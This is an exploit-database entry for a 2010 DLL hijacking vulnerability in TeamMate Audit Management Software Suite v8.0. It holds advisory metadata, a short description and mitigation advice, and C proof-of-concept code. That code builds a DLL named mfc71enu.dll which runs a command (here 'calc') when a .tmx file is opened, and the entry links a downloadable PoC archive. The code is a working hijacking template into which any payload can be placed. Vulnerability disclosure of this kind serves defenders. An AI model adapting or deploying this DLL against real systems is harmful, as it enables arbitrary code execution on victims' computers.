TeamMate Audit Management Software Suite DLL Hijacking

vendor:

TeamMate Audit Management Software Suite

by:

Beenu Arora

9,3

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: TeamMate Audit Management Software Suite

Affected Version From: TeamMate Audit Management Software Suite v8.0

Affected Version To: TeamMate Audit Management Software Suite v8.0 patch 2

Patch Exists: YES

Related CWE: N/A

CPE: a:teammate:teammate_audit_management_software_suite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

TeamMate Audit Management Software Suite DLL Hijacking

TeamMate Audit Management Software Suite is vulnerable to DLL Hijacking. An attacker can exploit this vulnerability by creating a malicious DLL file and renaming it to mfc71enu.dll, and creating a file in the same directory with one of the vulnerable extensions (.tmx). The malicious DLL file will be executed when the application is launched.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates. Also, ensure that all applications are running with the least privileges necessary.

Source

Exploit-DB raw data:

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban ,Ganesha, Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: TeamMate Audit Management Software Suite DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , TeamMate Audit Management Software Suite v8.0
patch 2
Vulnerable extensions: tmx

Compile and rename to mfc71enu.dll, create a file in the same dir with one
of the following extensions:
.tmx
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14747.zip